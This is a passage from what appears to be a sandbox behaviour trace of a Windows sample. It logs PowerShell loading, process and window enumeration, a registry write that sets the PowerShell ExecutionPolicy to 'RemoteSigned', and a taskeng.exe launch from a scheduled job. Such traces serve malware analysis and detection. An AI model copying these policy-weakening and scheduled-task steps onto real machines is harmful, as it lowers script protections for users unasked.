lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.361] GetLastError () returned 0xcb [0062.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5e5eab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.361] GetLastError () returned 0xcb [0062.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5e5eab4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.361] GetLastError () returned 0xcb [0062.402] GetCurrentProcessId () returned 0xa2c [0062.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39a5268, Length=0x20000, ResultLength=0x5e5f020 | out: SystemInformation=0x39a5268, ResultLength=0x5e5f020*=0x9df8) returned 0x0 [0062.408] EnumWindows (lpEnumFunc=0x2963902, lParam=0x0) returned 1 [0062.409] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.409] GetLastError () returned 0x0 [0062.409] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.409] GetLastError () returned 0x0 [0062.409] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.409] GetLastError () returned 0x0 [0062.409] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.409] GetLastError () returned 0x0 [0062.409] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.409] GetLastError () returned 0x0 [0062.410] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.410] GetLastError () returned 0x0 [0062.410] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.410] GetLastError () returned 0x0 [0062.410] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.410] GetLastError () returned 0x0 [0062.410] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.410] GetLastError () returned 0x0 [0062.410] GetWindowThreadProcessId (in: hWnd=0xf011c, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xa04 [0062.410] GetLastError () returned 0x0 [0062.410] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x558 [0062.410] GetLastError () returned 0x0 [0062.410] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.410] GetLastError () returned 0x0 [0062.411] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.411] GetLastError () returned 0x0 [0062.411] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.411] GetLastError () returned 0x0 [0062.411] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x538 [0062.411] GetLastError () returned 0x0 [0062.411] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.411] GetLastError () returned 0x0 [0062.411] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x778 [0062.411] GetLastError () returned 0x0 [0062.411] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x778 [0062.411] GetLastError () returned 0x0 [0062.411] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x460 [0062.411] GetLastError () returned 0x0 [0062.411] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.412] GetLastError () returned 0x0 [0062.412] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.412] GetLastError () returned 0x0 [0062.412] GetWindowThreadProcessId (in: hWnd=0x201bc, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.412] GetLastError () returned 0x0 [0062.412] GetWindowThreadProcessId (in: hWnd=0x201d0, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.412] GetLastError () returned 0x0 [0062.412] GetWindowThreadProcessId (in: hWnd=0x201d6, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.412] GetLastError () returned 0x0 [0062.412] GetWindowThreadProcessId (in: hWnd=0x301e8, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xa78 [0062.412] GetLastError () returned 0x0 [0062.412] GetWindowThreadProcessId (in: hWnd=0x40124, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xa30 [0062.412] GetLastError () returned 0x0 [0062.412] GetWindow (hWnd=0x40124, uCmd=0x4) returned 0x0 [0062.412] IsWindowVisible (hWnd=0x40124) returned 0 [0062.412] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x7a4 [0062.413] GetLastError () returned 0x0 [0062.413] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.413] GetLastError () returned 0x0 [0062.413] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.413] GetLastError () returned 0x0 [0062.413] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.413] GetLastError () returned 0x0 [0062.413] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.413] GetLastError () returned 0x0 [0062.413] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.413] GetLastError () returned 0x0 [0062.413] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.413] GetLastError () returned 0x0 [0062.413] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.413] GetLastError () returned 0x0 [0062.414] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.414] GetLastError () returned 0x0 [0062.414] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x6ac [0062.414] GetLastError () returned 0x0 [0062.414] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x58c [0062.414] GetLastError () returned 0x0 [0062.414] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x688 [0062.414] GetLastError () returned 0x0 [0062.414] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x7b0 [0062.414] GetLastError () returned 0x0 [0062.414] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x438 [0062.414] GetLastError () returned 0x0 [0062.414] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x178 [0062.414] GetLastError () returned 0x0 [0062.414] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x204 [0062.415] GetLastError () returned 0x0 [0062.415] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x2c8 [0062.415] GetLastError () returned 0x0 [0062.415] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x344 [0062.415] GetLastError () returned 0x0 [0062.415] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x618 [0062.415] GetLastError () returned 0x0 [0062.415] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x184 [0062.415] GetLastError () returned 0x0 [0062.415] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x7d8 [0062.415] GetLastError () returned 0x0 [0062.415] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xc0 [0062.415] GetLastError () returned 0x0 [0062.415] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x78c [0062.416] GetLastError () returned 0x0 [0062.416] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x6fc [0062.416] GetLastError () returned 0x0 [0062.416] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x358 [0062.416] GetLastError () returned 0x0 [0062.416] GetWindowThreadProcessId (in: hWnd=0x3015e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x5e4 [0062.416] GetLastError () returned 0x0 [0062.416] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x540 [0062.416] GetLastError () returned 0x0 [0062.416] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x538 [0062.416] GetLastError () returned 0x0 [0062.416] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x568 [0062.416] GetLastError () returned 0x0 [0062.416] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x538 [0062.416] GetLastError () returned 0x0 [0062.417] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x568 [0062.417] GetLastError () returned 0x0 [0062.417] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x538 [0062.417] GetLastError () returned 0x0 [0062.417] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x540 [0062.417] GetLastError () returned 0x0 [0062.417] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x540 [0062.417] GetLastError () returned 0x0 [0062.417] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x510 [0062.417] GetLastError () returned 0x0 [0062.417] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x57c [0062.417] GetLastError () returned 0x0 [0062.417] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x460 [0062.417] GetLastError () returned 0x0 [0062.418] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x554 [0062.418] GetLastError () returned 0x0 [0062.418] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.418] GetLastError () returned 0x0 [0062.418] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x528 [0062.418] GetLastError () returned 0x0 [0062.418] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.418] GetLastError () returned 0x0 [0062.418] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.418] GetLastError () returned 0x0 [0062.418] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.418] GetLastError () returned 0x0 [0062.418] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x79c [0062.418] GetLastError () returned 0x0 [0062.418] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.419] GetLastError () returned 0x0 [0062.419] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4e0 [0062.419] GetLastError () returned 0x0 [0062.419] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.419] GetLastError () returned 0x0 [0062.419] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x460 [0062.419] GetLastError () returned 0x0 [0062.419] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x460 [0062.419] GetLastError () returned 0x0 [0062.419] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x44c [0062.419] GetLastError () returned 0x0 [0062.419] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x778 [0062.419] GetLastError () returned 0x0 [0062.419] GetWindowThreadProcessId (in: hWnd=0x301ba, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x460 [0062.420] GetLastError () returned 0x0 [0062.420] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x460 [0062.420] GetLastError () returned 0x0 [0062.420] GetWindowThreadProcessId (in: hWnd=0x40122, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xa04 [0062.420] GetLastError () returned 0x0 [0062.420] GetWindowThreadProcessId (in: hWnd=0x301ac, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xa04 [0062.420] GetLastError () returned 0x0 [0062.420] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x558 [0062.420] GetLastError () returned 0x0 [0062.420] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.420] GetLastError () returned 0x0 [0062.420] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4d0 [0062.420] GetLastError () returned 0x0 [0062.420] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x460 [0062.420] GetLastError () returned 0x0 [0062.420] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x460 [0062.421] GetLastError () returned 0x0 [0062.421] GetWindowThreadProcessId (in: hWnd=0x201e6, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xa78 [0062.421] GetLastError () returned 0x0 [0062.421] GetWindowThreadProcessId (in: hWnd=0x40120, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xa40 [0062.421] GetLastError () returned 0x0 [0062.421] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x7a4 [0062.421] GetLastError () returned 0x0 [0062.421] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x6ac [0062.421] GetLastError () returned 0x0 [0062.421] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x58c [0062.421] GetLastError () returned 0x0 [0062.421] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x688 [0062.421] GetLastError () returned 0x0 [0062.421] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x7b0 [0062.421] GetLastError () returned 0x0 [0062.421] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x438 [0062.422] GetLastError () returned 0x0 [0062.422] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x178 [0062.422] GetLastError () returned 0x0 [0062.422] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x204 [0062.422] GetLastError () returned 0x0 [0062.422] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x2c8 [0062.422] GetLastError () returned 0x0 [0062.422] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x344 [0062.422] GetLastError () returned 0x0 [0062.422] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x618 [0062.422] GetLastError () returned 0x0 [0062.422] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x184 [0062.422] GetLastError () returned 0x0 [0062.422] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x7d8 [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0xc0 [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x78c [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x6fc [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x358 [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x5e4 [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x568 [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x538 [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x540 [0062.423] GetLastError () returned 0x0 [0062.423] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x510 [0062.423] GetLastError () returned 0x0 [0062.424] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x79c [0062.424] GetLastError () returned 0x0 [0062.424] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x4e0 [0062.424] GetLastError () returned 0x0 [0062.424] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x5e5ec70 | out: lpdwProcessId=0x5e5ec70) returned 0x778 [0062.424] GetLastError () returned 0x0 [0062.424] GetLastError () returned 0x0 [0062.424] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x2001f, phkResult=0x5e5f038 | out: phkResult=0x5e5f038*=0x0) returned 0x2 [0062.426] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x5e5f044, lpdwDisposition=0x5e5f0d4 | out: phkResult=0x5e5f044*=0x368, lpdwDisposition=0x5e5f0d4*=0x1) returned 0x0 [0062.428] RegQueryValueExW (in: hKey=0x368, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x5e5f090, lpData=0x0, lpcbData=0x5e5f08c*=0x0 | out: lpType=0x5e5f090*=0x0, lpData=0x0, lpcbData=0x5e5f08c*=0x0) returned 0x2 [0062.430] RegSetValueExW (in: hKey=0x368, lpValueName="ExecutionPolicy", Reserved=0x0, dwType=0x1, lpData="RemoteSigned", cbData=0x1a | out: lpData="RemoteSigned") returned 0x0 [0062.430] RegCloseKey (hKey=0x368) returned 0x0 [0062.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e5f044 | out: phkResult=0x5e5f044*=0x0) returned 0x2 [0062.431] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e5f044 | out: phkResult=0x5e5f044*=0x0) returned 0x2 [0062.431] GetEnvironmentVariableW (in: lpName="PSExecutionPolicyPreference", lpBuffer=0x4249f8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.431] GetLastError () returned 0xcb [0062.432] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x5e5f044 | out: phkResult=0x5e5f044*=0x368) returned 0x0 [0062.432] RegQueryValueExW (in: hKey=0x368, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x5e5f08c, lpData=0x0, lpcbData=0x5e5f088*=0x0 | out: lpType=0x5e5f08c*=0x1, lpData=0x0, lpcbData=0x5e5f088*=0x1a) returned 0x0 [0062.432] RegQueryValueExW (in: hKey=0x368, lpValueName="ExecutionPolicy", lpReserved=0x0, lpType=0x5e5f08c, lpData=0x4249f8, lpcbData=0x5e5f088*=0x1a | out: lpType=0x5e5f08c*=0x1, lpData="RemoteSigned", lpcbData=0x5e5f088*=0x1a) returned 0x0 [0062.432] RegCloseKey (hKey=0x368) returned 0x0 [0062.472] SetEvent (hEvent=0x390) returned 1 [0062.472] GetLastError () returned 0xcb [0062.472] SetEvent (hEvent=0x3a8) returned 1 [0062.473] GetLastError () returned 0xcb [0062.473] SetEvent (hEvent=0x3ac) returned 1 [0062.473] GetLastError () returned 0xcb [0062.473] SetEvent (hEvent=0x3cc) returned 1 [0062.473] GetLastError () returned 0xcb [0062.473] SetEvent (hEvent=0x320) returned 1 [0062.473] GetLastError () returned 0xcb [0062.473] SetEvent (hEvent=0x3b4) returned 1 [0062.473] GetLastError () returned 0xcb [0062.473] SetEvent (hEvent=0x3b8) returned 1 [0062.473] GetLastError () returned 0xcb [0062.473] SetEvent (hEvent=0x31c) returned 1 [0062.473] GetLastError () returned 0xcb [0062.473] SetEvent (hEvent=0x3bc) returned 1 [0062.480] GetLastError () returned 0xcb [0062.486] CoUninitialize () Thread: id = 131 os_tid = 0xae0 [0062.517] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0062.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0062.539] VirtualQuery (in: lpAddress=0x696e410, lpBuffer=0x696f410, dwLength=0x1c | out: lpBuffer=0x696f410*(BaseAddress=0x696e000, AllocationBase=0x5fe0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.539] VirtualQuery (in: lpAddress=0x696e52c, lpBuffer=0x696f52c, dwLength=0x1c | out: lpBuffer=0x696f52c*(BaseAddress=0x696e000, AllocationBase=0x5fe0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.604] SetEvent (hEvent=0x374) returned 1 [0062.604] GetLastError () returned 0x0 [0062.604] SetEvent (hEvent=0x378) returned 1 [0062.604] GetLastError () returned 0x0 [0062.604] SetEvent (hEvent=0x380) returned 1 [0062.604] GetLastError () returned 0x0 [0062.604] SetEvent (hEvent=0x374) returned 1 [0062.604] GetLastError () returned 0x0 [0062.604] SetEvent (hEvent=0x378) returned 1 [0062.604] GetLastError () returned 0x0 [0062.604] SetEvent (hEvent=0x3c4) returned 1 [0062.604] GetLastError () returned 0x0 [0062.604] SetEvent (hEvent=0x384) returned 1 [0062.604] GetLastError () returned 0x0 [0062.604] SetEvent (hEvent=0x388) returned 1 [0062.604] GetLastError () returned 0x0 [0062.605] SetEvent (hEvent=0x38c) returned 1 [0062.605] GetLastError () returned 0x0 [0062.605] SetEvent (hEvent=0x3b0) returned 1 [0062.616] GetLastError () returned 0x0 [0062.620] CoUninitialize () Process: id = "12" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x4c073000" os_pid = "0xa74" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "5" os_parent_pid = "0x938" cmd_line = "taskeng.exe {E4DF10F1-D271-43A1-9D50-21AF01AC53B9} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" 